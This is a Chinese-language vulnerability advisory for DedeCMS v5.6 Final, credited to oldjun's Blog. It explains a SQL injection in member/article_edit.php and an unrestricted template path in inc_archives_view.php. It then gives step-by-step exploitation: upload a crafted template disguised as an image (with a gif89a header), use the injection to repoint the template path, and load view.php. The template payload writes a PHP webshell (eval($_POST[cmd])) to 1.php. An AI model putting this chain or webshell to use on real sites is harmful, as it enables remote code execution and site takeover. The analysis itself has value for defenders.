影響版本:
DEDECMS v5.6 Final

程序介紹:
DedeCms 基于PHP+MySQL的技術(shù)開發(fā)，支持Windows、Linux、Unix等多種服務(wù)器平臺(tái)，從2004年開始發(fā)布第一個(gè)版本開始，至今已經(jīng)發(fā)布了五個(gè)大版本。DedeCms以簡(jiǎn)單、健壯、靈活、開源幾大特點(diǎn)占領(lǐng)了國(guó)內(nèi)CMS的大部份市場(chǎng)，目前已經(jīng)有超過二十萬(wàn)個(gè)站點(diǎn)正在使用DedeCms或居于DedeCms核心，是目前國(guó)內(nèi)應(yīng)用最廣泛的php類CMS系統(tǒng)。

漏洞分析:

Dedecms V5.6 Final版本中的各個(gè)文件存在一系列問題，經(jīng)過精心構(gòu)造的含有惡意代表的模板內(nèi)容可以通過用戶后臺(tái)的上傳附件的功能上傳上去，然后通過SQL注入修改附加表的模板路徑為我們上傳的模板路徑，模板解析類：include/inc_archives_view.php沒有對(duì)模板路徑及名稱做任何限制，則可以成功執(zhí)行惡意代碼。

1、member/article_edit.php文件（注入）：
//漏洞在member文件夾下普遍存在，$dede_addonfields是由用戶提交的，可以被偽造，偽造成功即可帶入sql語(yǔ)句，于是我們可以給附加表的內(nèi)容進(jìn)行update賦值。
2、include/inc_archives_view.php：
//這是模板處理類，如果附加表的模板路徑存在，直接從附加表取值；GetTempletFile獲取模板文件的方法就是取的此處的模板路徑，從來(lái)帶進(jìn)去解析。
漏洞利用:

1.上傳一個(gè)模板文件：

注冊(cè)一個(gè)用戶，進(jìn)入用戶管理后臺(tái)，發(fā)表一篇文章，上傳一個(gè)圖片，然后在附件管理里，把圖片替換為我們精心構(gòu)造的模板，比如圖片名稱是：
uploads/userup/2/12OMX04-15A.jpg

模板內(nèi)容是（如果限制圖片格式，加gif89a）：
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2.修改剛剛發(fā)表的文章，查看源文件，構(gòu)造一個(gè)表單：
提交，提示修改成功，則我們已經(jīng)成功修改模板路徑。

3.訪問修改的文章：

假設(shè)剛剛修改的文章的aid為2，則我們只需要訪問：
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目錄下生成小馬：1.php

解決方案:
廠商補(bǔ)丁:
DEDECMS
------------
目前廠商還沒有提供補(bǔ)丁或者升級(jí)程序，我們建議使用此軟件的用戶隨時(shí)關(guān)注廠商的主頁(yè)以獲取最新版本：
http://www.dedecms.com/

信息來(lái)源: oldjun's Blog